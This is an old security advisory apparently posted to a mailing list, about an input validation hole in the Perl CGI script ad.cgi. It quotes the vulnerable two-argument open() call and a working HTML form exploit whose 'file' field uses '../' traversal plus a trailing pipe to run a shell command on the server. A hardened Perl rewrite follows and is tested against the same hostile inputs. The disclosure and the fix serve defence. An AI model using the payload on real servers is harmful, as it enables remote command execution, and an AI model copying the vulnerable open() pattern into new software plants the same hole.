Subject: Insecure input validation in ad.cgi
From: rpc (h CKZ.ORG)
Date: Mon Dec 11 2000 - 09:10:22 CST
Hi,
ad.cgi from "Scripts by Tammie's HUSBAND" contains an insecure input validation
vulnerability.
Information on ad.cgi is available at:
http://www.conservatives.net/atheist/scripts/index.html?ads
----code snippet----
$filename = "$FORM{'file'}";
$datafile = "$basedir" . "$filename";
...
open (INFO, "$datafile");
-----------------
Exploit:
<html>
<form action="http://www.conservatives.net/someplace/ad.cgi" method=POST>
<h1>ad.cgi exploit</h1>
Command: <input type=text name=file value="../../../../../../../../bin/ping -c
5 www.foo.com|">
<input type=submit value=run>
</form>
</html>
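
The hardened form of the open() call quoted in the snippet above, as an added example that is not part of the original post or of ad.cgi itself. The two-argument open() treats a trailing "|" in the path as "run this as a command", and the unchecked "file" parameter also allows "../" traversal. The version below uses an allowlist on the name, a containment check, and three-argument open(). The temporary $basedir, the file banner1.txt and the function open_ad_file are hypothetical names chosen for the illustration.

```perl
#!/usr/bin/perl
use strict;
use warnings;
use File::Temp qw(tempdir);
use File::Spec;
use Cwd qw(realpath);

# Constructed sandbox standing in for the script's $basedir (assumption).
my $basedir = realpath(tempdir(CLEANUP => 1));
open(my $seed, '>', File::Spec->catfile($basedir, 'banner1.txt')) or die $!;
print {$seed} "ad text\n";
close($seed);

# Hypothetical hardened replacement for: open (INFO, "$datafile");
sub open_ad_file {
    my ($name) = @_;
    # Allowlist: a bare file name only. Rejects '/', a leading '.', '|',
    # '<', '>', whitespace and NUL, so neither path traversal nor open()
    # mode characters survive validation.
    return (undef, 'rejected: bad name')
        unless defined $name && $name =~ /\A[A-Za-z0-9_][A-Za-z0-9_.-]{0,63}\z/;
    my $path = File::Spec->catfile($basedir, $name);
    # Resolve symlinks and confirm the result is still inside $basedir.
    my $real = realpath($path);
    return (undef, 'rejected: outside basedir or missing')
        unless defined $real && index($real, "$basedir/") == 0 && -f $real;
    # Three-argument open: the mode is fixed to '<', so the path is never
    # interpreted as a command even if validation were bypassed.
    open(my $fh, '<', $real) or return (undef, "open failed: $!");
    return ($fh, 'ok');
}

# Constructed inputs: one legitimate name, then the input shapes the
# advisory describes (traversal, trailing pipe).
for my $input ('banner1.txt', '../banner1.txt', 'banner1.txt|',
               '../../bin/ping -c 5 www.foo.com|') {
    my ($fh, $status) = open_ad_file($input);
    printf "%-36s => %s\n", "'$input'", $status;
    close($fh) if $fh;
}
```

Only the first input is opened; the other three are rejected by the name check before any path is built.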